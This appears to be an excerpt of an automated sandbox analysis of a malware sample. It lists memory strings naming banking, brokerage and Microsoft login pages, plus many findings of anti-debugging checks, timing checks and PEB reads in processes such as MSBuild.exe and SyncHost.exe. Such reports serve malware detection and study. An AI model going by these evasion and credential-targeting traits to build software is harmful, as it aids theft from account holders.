Source: SyncHost.exe, 0000000D.00000002.2687286234.00000000076D2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rdVMware20,11696487552
Source: -2-2FfKI.13.dr Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: -2-2FfKI.13.dr Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: -2-2FfKI.13.dr Binary or memory string: discord.comVMware20,11696487552f
Source: -2-2FfKI.13.dr Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: -2-2FfKI.13.dr Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: wscript.exe, 00000000.00000003.2094688979.00000213EF302000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2098682437.00000213EF302000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2098682437.00000213EF360000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2090037082.00000213EF360000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2090037082.00000213EF2FD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094688979.00000213EF360000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: SyncHost.exe, 0000000D.00000002.2687286234.00000000076D2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: word management pageVMware20,11696487552
Source: -2-2FfKI.13.dr Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: SyncHost.exe, 0000000D.00000002.2687286234.00000000076D2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ers.comVMware20,11696487552
Source: wscript.exe, 00000000.00000003.2094688979.00000213EF32F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}5hx
Source: -2-2FfKI.13.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: -2-2FfKI.13.dr Binary or memory string: tasks.office.comVMware20,11696487552o
Source: -2-2FfKI.13.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: -2-2FfKI.13.dr Binary or memory string: global block list test formVMware20,11696487552
Source: -2-2FfKI.13.dr Binary or memory string: AMC password management pageVMware20,11696487552
Source: SyncHost.exe, 0000000D.00000002.2682656755.0000000002779000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: -2-2FfKI.13.dr Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: SyncHost.exe, 0000000D.00000002.2687286234.00000000076D2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: (_1ers.comVMware20,11696487552
Source: SyncHost.exe, 0000000D.00000002.2687286234.00000000076D2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: l.comVMware20,11696487552h
Source: -2-2FfKI.13.dr Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: -2-2FfKI.13.dr Binary or memory string: dev.azure.comVMware20,11696487552j
Source: -2-2FfKI.13.dr Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: -2-2FfKI.13.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: SyncHost.exe, 0000000D.00000002.2687286234.00000000076D2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: kers.comVMware20,11696487552}
Source: SyncHost.exe, 0000000D.00000002.2687286234.00000000076D2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware20,11696487552~
Source: -2-2FfKI.13.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: -2-2FfKI.13.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: -2-2FfKI.13.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: -2-2FfKI.13.dr Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: -2-2FfKI.13.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: SyncHost.exe, 0000000D.00000002.2687286234.00000000076D2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rs - HKVMware20,11696487552]
Source: -2-2FfKI.13.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: -2-2FfKI.13.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: SYYSBomrTxWSggG.exe, 00000011.00000002.3367996635.000000000111F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllG
Source: -2-2FfKI.13.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: -2-2FfKI.13.dr Binary or memory string: outlook.office.comVMware20,11696487552s
Source: -2-2FfKI.13.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: -2-2FfKI.13.dr Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: -2-2FfKI.13.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: -2-2FfKI.13.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: -2-2FfKI.13.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0106D1C0 rdtsc 10_2_0106D1C0
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_004173E3 LdrLoadDll, 10_2_004173E3
Contains functionality to read the PEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FEC0F0 mov eax, dword ptr fs:[00000030h] 10_2_00FEC0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0109A118 mov ecx, dword ptr fs:[00000030h] 10_2_0109A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0109A118 mov eax, dword ptr fs:[00000030h] 10_2_0109A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0109A118 mov eax, dword ptr fs:[00000030h] 10_2_0109A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0109A118 mov eax, dword ptr fs:[00000030h] 10_2_0109A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FF80E9 mov eax, dword ptr fs:[00000030h] 10_2_00FF80E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FEA0E3 mov ecx, dword ptr fs:[00000030h] 10_2_00FEA0E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010B0115 mov eax, dword ptr fs:[00000030h] 10_2_010B0115
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01020124 mov eax, dword ptr fs:[00000030h] 10_2_01020124
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01083140 mov eax, dword ptr fs:[00000030h] 10_2_01083140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01083140 mov eax, dword ptr fs:[00000030h] 10_2_01083140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01083140 mov eax, dword ptr fs:[00000030h] 10_2_01083140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01084144 mov eax, dword ptr fs:[00000030h] 10_2_01084144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01084144 mov eax, dword ptr fs:[00000030h] 10_2_01084144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01084144 mov ecx, dword ptr fs:[00000030h] 10_2_01084144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01084144 mov eax, dword ptr fs:[00000030h] 10_2_01084144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01084144 mov eax, dword ptr fs:[00000030h] 10_2_01084144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01088158 mov eax, dword ptr fs:[00000030h] 10_2_01088158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010C5152 mov eax, dword ptr fs:[00000030h] 10_2_010C5152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FF5096 mov eax, dword ptr fs:[00000030h] 10_2_00FF5096
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01089179 mov eax, dword ptr fs:[00000030h] 10_2_01089179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FED08D mov eax, dword ptr fs:[00000030h] 10_2_00FED08D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FF208A mov eax, dword ptr fs:[00000030h] 10_2_00FF208A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010AC188 mov eax, dword ptr fs:[00000030h] 10_2_010AC188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010AC188 mov eax, dword ptr fs:[00000030h] 10_2_010AC188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01030185 mov eax, dword ptr fs:[00000030h] 10_2_01030185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01047190 mov eax, dword ptr fs:[00000030h] 10_2_01047190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0107019F mov eax, dword ptr fs:[00000030h] 10_2_0107019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0107019F mov eax, dword ptr fs:[00000030h] 10_2_0107019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0107019F mov eax, dword ptr fs:[00000030h] 10_2_0107019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0107019F mov eax, dword ptr fs:[00000030h] 10_2_0107019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010A11A4 mov eax, dword ptr fs:[00000030h] 10_2_010A11A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010A11A4 mov eax, dword ptr fs:[00000030h] 10_2_010A11A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010A11A4 mov eax, dword ptr fs:[00000030h] 10_2_010A11A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010A11A4 mov eax, dword ptr fs:[00000030h] 10_2_010A11A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FF2050 mov eax, dword ptr fs:[00000030h] 10_2_00FF2050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0100B1B0 mov eax, dword ptr fs:[00000030h] 10_2_0100B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010C51CB mov eax, dword ptr fs:[00000030h] 10_2_010C51CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010B61C3 mov eax, dword ptr fs:[00000030h] 10_2_010B61C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010B61C3 mov eax, dword ptr fs:[00000030h] 10_2_010B61C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0102D1D0 mov eax, dword ptr fs:[00000030h] 10_2_0102D1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0102D1D0 mov ecx, dword ptr fs:[00000030h] 10_2_0102D1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0106E1D0 mov eax, dword ptr fs:[00000030h] 10_2_0106E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0106E1D0 mov eax, dword ptr fs:[00000030h] 10_2_0106E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0106E1D0 mov ecx, dword ptr fs:[00000030h] 10_2_0106E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0106E1D0 mov eax, dword ptr fs:[00000030h] 10_2_0106E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0106E1D0 mov eax, dword ptr fs:[00000030h] 10_2_0106E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FEA020 mov eax, dword ptr fs:[00000030h] 10_2_00FEA020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FEC020 mov eax, dword ptr fs:[00000030h] 10_2_00FEC020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010C61E5 mov eax, dword ptr fs:[00000030h] 10_2_010C61E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010151EF mov eax, dword ptr fs:[00000030h] 10_2_010151EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010151EF mov eax, dword ptr fs:[00000030h] 10_2_010151EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010151EF mov eax, dword ptr fs:[00000030h] 10_2_010151EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010151EF mov eax, dword ptr fs:[00000030h] 10_2_010151EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010151EF mov eax, dword ptr fs:[00000030h] 10_2_010151EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010151EF mov eax, dword ptr fs:[00000030h] 10_2_010151EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010151EF mov eax, dword ptr fs:[00000030h] 10_2_010151EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010151EF mov eax, dword ptr fs:[00000030h] 10_2_010151EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010151EF mov eax, dword ptr fs:[00000030h] 10_2_010151EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010151EF mov eax, dword ptr fs:[00000030h] 10_2_010151EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010151EF mov eax, dword ptr fs:[00000030h] 10_2_010151EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010151EF mov eax, dword ptr fs:[00000030h] 10_2_010151EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010151EF mov eax, dword ptr fs:[00000030h] 10_2_010151EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010971F9 mov esi, dword ptr fs:[00000030h] 10_2_010971F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010201F8 mov eax, dword ptr fs:[00000030h] 10_2_010201F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01074000 mov ecx, dword ptr fs:[00000030h] 10_2_01074000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FF51ED mov eax, dword ptr fs:[00000030h] 10_2_00FF51ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0100E016 mov eax, dword ptr fs:[00000030h] 10_2_0100E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0100E016 mov eax, dword ptr fs:[00000030h] 10_2_0100E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0100E016 mov eax, dword ptr fs:[00000030h] 10_2_0100E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0100E016 mov eax, dword ptr fs:[00000030h] 10_2_0100E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010B903E mov eax, dword ptr fs:[00000030h] 10_2_010B903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010B903E mov eax, dword ptr fs:[00000030h] 10_2_010B903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010B903E mov eax, dword ptr fs:[00000030h] 10_2_010B903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010B903E mov eax, dword ptr fs:[00000030h] 10_2_010B903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01086030 mov eax, dword ptr fs:[00000030h] 10_2_01086030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0101B052 mov eax, dword ptr fs:[00000030h] 10_2_0101B052
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0109705E mov ebx, dword ptr fs:[00000030h] 10_2_0109705E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0109705E mov eax, dword ptr fs:[00000030h] 10_2_0109705E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01076050 mov eax, dword ptr fs:[00000030h] 10_2_01076050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FEA197 mov eax, dword ptr fs:[00000030h] 10_2_00FEA197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FEA197 mov eax, dword ptr fs:[00000030h] 10_2_00FEA197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FEA197 mov eax, dword ptr fs:[00000030h] 10_2_00FEA197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0107106E mov eax, dword ptr fs:[00000030h] 10_2_0107106E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010C5060 mov eax, dword ptr fs:[00000030h] 10_2_010C5060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01001070 mov eax, dword ptr fs:[00000030h] 10_2_01001070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01001070 mov ecx, dword ptr fs:[00000030h] 10_2_01001070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01001070 mov eax, dword ptr fs:[00000030h] 10_2_01001070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01001070 mov eax, dword ptr fs:[00000030h] 10_2_01001070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01001070 mov eax, dword ptr fs:[00000030h] 10_2_01001070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01001070 mov eax, dword ptr fs:[00000030h] 10_2_01001070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01001070 mov eax, dword ptr fs:[00000030h] 10_2_01001070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01001070 mov eax, dword ptr fs:[00000030h] 10_2_01001070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01001070 mov eax, dword ptr fs:[00000030h] 10_2_01001070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01001070 mov eax, dword ptr fs:[00000030h] 10_2_01001070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01001070 mov eax, dword ptr fs:[00000030h] 10_2_01001070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01001070 mov eax, dword ptr fs:[00000030h] 10_2_01001070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01001070 mov eax, dword ptr fs:[00000030h] 10_2_01001070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0101C073 mov eax, dword ptr fs:[00000030h] 10_2_0101C073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0106D070 mov ecx, dword ptr fs:[00000030h] 10_2_0106D070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0107D080 mov eax, dword ptr fs:[00000030h] 10_2_0107D080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0107D080 mov eax, dword ptr fs:[00000030h] 10_2_0107D080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FEF172 mov eax, dword ptr fs:[00000030h] 10_2_00FEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FEF172 mov eax, dword ptr fs:[00000030h] 10_2_00FEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FEF172 mov eax, dword ptr fs:[00000030h] 10_2_00FEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FEF172 mov eax, dword ptr fs:[00000030h] 10_2_00FEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FEF172 mov eax, dword ptr fs:[00000030h] 10_2_00FEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FEF172 mov eax, dword ptr fs:[00000030h] 10_2_00FEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FEF172 mov eax, dword ptr fs:[00000030h] 10_2_00FEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FEF172 mov eax, dword ptr fs:[00000030h] 10_2_00FEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FEF172 mov eax, dword ptr fs:[00000030h] 10_2_00FEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FEF172 mov eax, dword ptr fs:[00000030h] 10_2_00FEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FEF172 mov eax, dword ptr fs:[00000030h] 10_2_00FEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FEF172 mov eax, dword ptr fs:[00000030h] 10_2_00FEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FEF172 mov eax, dword ptr fs:[00000030h] 10_2_00FEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FEF172 mov eax, dword ptr fs:[00000030h] 10_2_00FEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FEF172 mov eax, dword ptr fs:[00000030h] 10_2_00FEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FEF172 mov eax, dword ptr fs:[00000030h] 10_2_00FEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FEF172 mov eax, dword ptr fs:[00000030h] 10_2_00FEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FEF172 mov eax, dword ptr fs:[00000030h] 10_2_00FEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FEF172 mov eax, dword ptr fs:[00000030h] 10_2_00FEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FEF172 mov eax, dword ptr fs:[00000030h] 10_2_00FEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FEF172 mov eax, dword ptr fs:[00000030h] 10_2_00FEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0101D090 mov eax, dword ptr fs:[00000030h] 10_2_0101D090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0101D090 mov eax, dword ptr fs:[00000030h] 10_2_0101D090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0102909C mov eax, dword ptr fs:[00000030h] 10_2_0102909C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010880A8 mov eax, dword ptr fs:[00000030h] 10_2_010880A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FEC156 mov eax, dword ptr fs:[00000030h] 10_2_00FEC156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FF6154 mov eax, dword ptr fs:[00000030h] 10_2_00FF6154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FF6154 mov eax, dword ptr fs:[00000030h] 10_2_00FF6154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FF7152 mov eax, dword ptr fs:[00000030h] 10_2_00FF7152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010B60B8 mov eax, dword ptr fs:[00000030h] 10_2_010B60B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010B60B8 mov ecx, dword ptr fs:[00000030h] 10_2_010B60B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FE9148 mov eax, dword ptr fs:[00000030h] 10_2_00FE9148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FE9148 mov eax, dword ptr fs:[00000030h] 10_2_00FE9148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FE9148 mov eax, dword ptr fs:[00000030h] 10_2_00FE9148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FE9148 mov eax, dword ptr fs:[00000030h] 10_2_00FE9148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010070C0 mov eax, dword ptr fs:[00000030h] 10_2_010070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010070C0 mov ecx, dword ptr fs:[00000030h] 10_2_010070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010070C0 mov ecx, dword ptr fs:[00000030h] 10_2_010070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010070C0 mov eax, dword ptr fs:[00000030h] 10_2_010070C0
